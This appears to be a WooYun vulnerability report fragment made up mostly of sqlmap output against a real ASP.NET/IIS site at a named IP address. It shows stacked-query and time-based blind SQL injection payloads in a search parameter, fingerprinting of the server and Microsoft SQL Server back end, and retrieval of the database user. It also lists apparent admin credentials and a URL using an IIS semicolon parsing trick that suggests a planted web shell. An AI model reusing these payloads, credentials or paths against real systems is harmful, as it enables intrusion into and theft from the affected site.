WooYun.org

admin 123321

Place: POST
Parameter: TxtADName
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=9Z0dbrYz3l
8m4MD31fnNNh3goVkSR+zZlaJSNr7N8/qYSmBr2mSdyaZYjf70oRMLurPZq+/DFVDKDJths/sbFuZXnw
b3354EufupPqow0SSpix3ycprDSHrzCPSfDi8qorvjzXbj3bz3bSWkptNNKdeCVkqVTPRfDDg6qqgyBo
yxX0LkETiLDkmM547DvVZRiez544CPCwfFAAPf1x0aaKZtv8Mi9Ql8hjCTaxWa417lC/iYVBzowlRJhg
hzL7eifqRAjaU7fAM1fLGEjAWT3d8xWV4kdZePsKQ9+LEGMSJGZPpV&__VIEWSTATEGENERATOR=C93C
01F5&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=sZyvVegvUCrZ6R7nyZ08L4PHUnzqGaITfdg
tXDisoM9MX0Kk4I6ZyYJC7TntDNvkyyflIhvbW31p3YuvnS2gL56qWEAoDpXEpTMAU8SFeA4CISoMTEj
DGIhakoiXQcXE8gz9iQ==&TxtADName=1'; WAITFOR DELAY '0:0:5';--&BntSearch=??
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=9Z0dbrYz3l
8m4MD31fnNNh3goVkSR+zZlaJSNr7N8/qYSmBr2mSdyaZYjf70oRMLurPZq+/DFVDKDJths/sbFuZXnw
b3354EufupPqow0SSpix3ycprDSHrzCPSfDi8qorvjzXbj3bz3bSWkptNNKdeCVkqVTPRfDDg6qqgyBo
yxX0LkETiLDkmM547DvVZRiez544CPCwfFAAPf1x0aaKZtv8Mi9Ql8hjCTaxWa417lC/iYVBzowlRJhg
hzL7eifqRAjaU7fAM1fLGEjAWT3d8xWV4kdZePsKQ9+LEGMSJGZPpV&__VIEWSTATEGENERATOR=C93C
01F5&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=sZyvVegvUCrZ6R7nyZ08L4PHUnzqGaITfdg
tXDisoM9MX0Kk4I6ZyYJC7TntDNvkyyflIhvbW31p3YuvnS2gL56qWEAoDpXEpTMAU8SFeA4CISoMTEj
DGIhakoiXQcXE8gz9iQ==&TxtADName=1' WAITFOR DELAY '0:0:5'--&BntSearch=??
---
[09:57:08] [INFO] testing MySQL
[09:57:08] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[09:57:09] [WARNING] the back-end DBMS is not MySQL
[09:57:09] [INFO] testing Oracle
[09:57:09] [WARNING] the back-end DBMS is not Oracle
[09:57:09] [INFO] testing PostgreSQL
[09:57:09] [WARNING] the back-end DBMS is not PostgreSQL
[09:57:09] [INFO] testing Microsoft SQL Server
[09:57:14] [INFO] confirming Microsoft SQL Server
[09:57:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[09:57:34] [INFO] fetching current user
[09:57:34] [INFO] retrieved:
[09:57:40] [INFO] adjusting time delay to 4 seconds due to good response times
sql_zfkj2014
current user:    'sql_zfkj2014'

[10:19:32] [INFO] testing Microsoft SQL Server
[10:19:32] [WARNING] it is very important not to stress the network adapter's b
ndwidth during usage of time-based queries
[10:19:38] [INFO] confirming Microsoft SQL Server
[10:19:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[10:19:54] [INFO] fetching current user
[10:19:54] [INFO] retrieved: sql_zfkj2014

current user:    'sql_zfkj2014'

current user:    'sql_zfkj2014'

current user:    'sql_zfkj2014'

current user:    'sql_zfkj2014'

http://210.51.195.4/Templates/cn/html/1.asp;.html